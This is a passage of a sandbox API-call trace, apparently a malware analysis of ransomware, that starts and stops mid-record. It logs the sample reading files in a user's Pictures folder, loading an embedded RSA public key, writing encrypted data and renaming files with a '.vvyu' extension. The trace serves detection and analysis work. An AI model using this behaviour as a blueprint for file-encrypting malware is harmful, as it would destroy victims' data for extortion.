lpNumberOfBytesWritten=0x30ffb14*=0x12d87, lpOverlapped=0x0) returned 1 [0193.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.949] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12d8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.950] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.951] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.951] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.951] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.951] CloseHandle (hObject=0x584) returned 1 [0193.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0193.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d49778 [0193.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0193.954] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\K4yCl.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\k4ycl.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\K4yCl.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\k4ycl.jpg.vvyu")) returned 1 [0193.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.955] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.960] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50e7f7a0, ftCreationTime.dwHighDateTime=0x1d897f9, ftLastAccessTime.dwLowDateTime=0x517683c0, ftLastAccessTime.dwHighDateTime=0x1d89d22, ftLastWriteTime.dwLowDateTime=0x517683c0, ftLastWriteTime.dwHighDateTime=0x1d89d22, nFileSizeHigh=0x0, nFileSizeLow=0x26aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xGPgXL.jpg", cAlternateFileName="")) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.960] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\xGPgXL.jpg") returned=".jpg" [0193.960] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\xGPgXL.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\xgpgxl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.964] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=9898) returned 1 [0193.964] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.967] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2684, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.967] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.969] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.969] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x26aa, lpOverlapped=0x0) returned 1 [0193.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.971] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.972] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.972] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.972] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.972] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.972] GetLastError () returned 0x0 [0193.972] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.972] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.973] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.973] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.973] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x26b0) returned 0x2d49778 [0193.973] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42268 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d422b0 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.975] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0193.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0193.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0193.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fd0 [0193.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39fb8 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0193.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.977] GetCurrentThreadId () returned 0x264 [0193.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46120 [0193.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.978] GetCurrentThreadId () returned 0x264 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0193.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fd0 [0193.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a030 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a048 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fe8 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fb8 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0193.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0193.985] 